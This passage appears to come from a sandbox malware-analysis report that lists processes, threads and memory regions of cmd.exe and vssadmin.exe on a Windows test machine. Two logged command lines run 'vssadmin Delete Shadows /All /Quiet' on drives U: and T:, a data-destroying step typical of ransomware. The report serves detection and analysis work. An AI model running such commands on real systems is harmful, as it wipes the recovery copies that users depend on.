	          end_va = 0x24fd45d6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 1989
	        start_va = 0x24fd28c0000
	          end_va = 0x24fd28e0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 1990
	        start_va = 0x24fd4180000
	          end_va = 0x24fd41d9fff
	       monitored = 1
	     entry_point = 0x24fd41953f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 1991
	        start_va = 0x24fd41f0000
	          end_va = 0x24fd41fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024fd41f0000"
	        filename = ""

Region:
	              id = 2011
	        start_va = 0x24fd45e0000
	          end_va = 0x24fd47fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024fd45e0000"
	        filename = ""

Region:
	              id = 2014
	        start_va = 0x24fd4800000
	          end_va = 0x24fd4a1bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024fd4800000"
	        filename = ""

Region:
	              id = 2015
	        start_va = 0x24fd4a20000
	          end_va = 0x24fd4b2bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024fd4a20000"
	        filename = ""

Region:
	              id = 2016
	        start_va = 0x24fd4b30000
	          end_va = 0x24fd4d4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024fd4b30000"
	        filename = ""

Region:
	              id = 2019
	        start_va = 0x24fd4d50000
	          end_va = 0x24fd4e5efff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024fd4d50000"
	        filename = ""

Region:
	              id = 2029
	        start_va = 0x5af21a0000
	          end_va = 0x5af21dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000005af21a0000"
	        filename = ""

Region:
	              id = 2030
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 2031
	        start_va = 0x24fd28c0000
	          end_va = 0x24fd28c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024fd28c0000"
	        filename = ""

Region:
	              id = 2032
	        start_va = 0x24fd4e60000
	          end_va = 0x24fd4f1bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024fd4e60000"
	        filename = ""

Region:
	              id = 2033
	        start_va = 0x24fd28c0000
	          end_va = 0x24fd28c3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024fd28c0000"
	        filename = ""

Region:
	              id = 2034
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 2035
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 2036
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 2037
	        start_va = 0x24fd28d0000
	          end_va = 0x24fd28d6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024fd28d0000"
	        filename = ""

Region:
	              id = 2038
	        start_va = 0x24fd28e0000
	          end_va = 0x24fd28e0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024fd28e0000"
	        filename = ""

Region:
	              id = 2039
	        start_va = 0x24fd28f0000
	          end_va = 0x24fd28f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024fd28f0000"
	        filename = ""

Region:
	              id = 2040
	        start_va = 0x24fd2900000
	          end_va = 0x24fd2904fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 2041
	        start_va = 0x24fd2920000
	          end_va = 0x24fd2920fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 2050
	        start_va = 0x24fd2930000
	          end_va = 0x24fd2931fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024fd2930000"
	        filename = ""

Region:
	              id = 2051
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 2052
	        start_va = 0x24fd2940000
	          end_va = 0x24fd2940fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 2053
	        start_va = 0x24fd2950000
	          end_va = 0x24fd2951fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024fd2950000"
	        filename = ""


Thread:
	id = 86
	os_tid = 0x13d8


Thread:
	id = 88
	os_tid = 0x10e4


Thread:
	id = 91
	os_tid = 0x13d0


Thread:
	id = 94
	os_tid = 0x4ec


Process:
	id = "29"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x2fec3000"
	os_pid = "0x1384"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "16"
	os_parent_pid = "0xef0"
	cmd_line = "vssadmin  Delete Shadows /For=U: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1993
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 1994
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 1995
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 1996
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 1997
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 1998
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 1999
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 2000
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 2001
	        start_va = 0x760000
	          end_va = 0x761fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000760000"
	        filename = ""

Region:
	              id = 2002
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 2003
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 2004
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 2005
	        start_va = 0x7efb0000
	          end_va = 0x7efd2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007efb0000"
	        filename = ""

Region:
	              id = 2006
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 2007
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 2008
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 2009
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 2010
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 2012
	        start_va = 0x100000
	          end_va = 0x1cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000100000"
	        filename = ""

Region:
	              id = 2013
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 2017
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 2018
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 2020
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 2021
	        start_va = 0x4880000
	          end_va = 0x4a6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 2022
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 2023
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 2026
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 2027
	        start_va = 0x7eeb0000
	          end_va = 0x7efaffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007eeb0000"
	        filename = ""

Region:
	              id = 2042
	        start_va = 0x100000
	          end_va = 0x1bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 2043
	        start_va = 0x1c0000
	          end_va = 0x1cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 2044
	        start_va = 0x760000
	          end_va = 0x763fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000760000"
	        filename = ""

Region:
	              id = 2045
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 2046
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 2047
	        start_va = 0x400000
	          end_va = 0x43ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 2048
	        start_va = 0x440000
	          end_va = 0x47ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000440000"
	        filename = ""

Region:
	              id = 2049
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 2054
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 2055
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 2056
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 2057
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 2058
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 2059
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 2060
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 2061
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 2062
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 2063
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 2064
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 2065
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 2066
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 2067
	        start_va = 0x4a70000
	          end_va = 0x4b7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a70000"
	        filename = ""

Region:
	              id = 2068
	        start_va = 0x480000
	          end_va = 0x607fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000480000"
	        filename = ""

Region:
	              id = 2069
	        start_va = 0x770000
	          end_va = 0x799fff
	       monitored = 0
	     entry_point = 0x775680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 2070
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 2071
	        start_va = 0x770000
	          end_va = 0x77cfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 2072
	        start_va = 0x4b80000
	          end_va = 0x4d00fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004b80000"
	        filename = ""

Region:
	              id = 2073
	        start_va = 0x4d10000
	          end_va = 0x610ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004d10000"
	        filename = ""

Region:
	              id = 2074
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 2075
	        start_va = 0x1d0000
	          end_va = 0x1d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001d0000"
	        filename = ""

Region:
	              id = 2101
	        start_va = 0x780000
	          end_va = 0x783fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000780000"
	        filename = ""

Region:
	              id = 2102
	        start_va = 0x4880000
	          end_va = 0x4969fff
	       monitored = 0
	     entry_point = 0x48bd650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 2103
	        start_va = 0x4970000
	          end_va = 0x4a6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004970000"
	        filename = ""

Region:
	              id = 2110
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 2566
	        start_va = 0x790000
	          end_va = 0x790fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000790000"
	        filename = ""

Region:
	              id = 2567
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 2568
	        start_va = 0x7a0000
	          end_va = 0x7a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007a0000"
	        filename = ""

Region:
	              id = 3010
	        start_va = 0x610000
	          end_va = 0x64ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000610000"
	        filename = ""

Region:
	              id = 3011
	        start_va = 0x650000
	          end_va = 0x68ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000650000"
	        filename = ""

Region:
	              id = 3023
	        start_va = 0x690000
	          end_va = 0x6cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000690000"
	        filename = ""

Region:
	              id = 3024
	        start_va = 0x6d0000
	          end_va = 0x70ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000006d0000"
	        filename = ""

Region:
	              id = 3025
	        start_va = 0x710000
	          end_va = 0x74ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000710000"
	        filename = ""

Region:
	              id = 3026
	        start_va = 0x7b0000
	          end_va = 0x7effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007b0000"
	        filename = ""

Region:
	              id = 3065
	        start_va = 0x4880000
	          end_va = 0x495ffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 3066
	        start_va = 0x4a70000
	          end_va = 0x4aeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a70000"
	        filename = ""

Region:
	              id = 3067
	        start_va = 0x4b70000
	          end_va = 0x4b7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004b70000"
	        filename = ""

Region:
	              id = 3068
	        start_va = 0x7f0000
	          end_va = 0x7f8fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 93
	os_tid = 0x1240


Thread:
	id = 95
	os_tid = 0x139c


Thread:
	id = 242
	os_tid = 0xc14


Thread:
	id = 244
	os_tid = 0xc1c


Thread:
	id = 245
	os_tid = 0xc20


Process:
	id = "30"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x78d7c000"
	os_pid = "0x1040"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "19"
	os_parent_pid = "0xf68"
	cmd_line = "vssadmin  Delete Shadows /For=T: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 2077
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 2078
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 2079
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 2080
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 2081
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 2082
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 2083
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 2084
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 2085
	        start_va = 0x400000
	          end_va = 0x401fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 2086
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 2087
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 2088
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
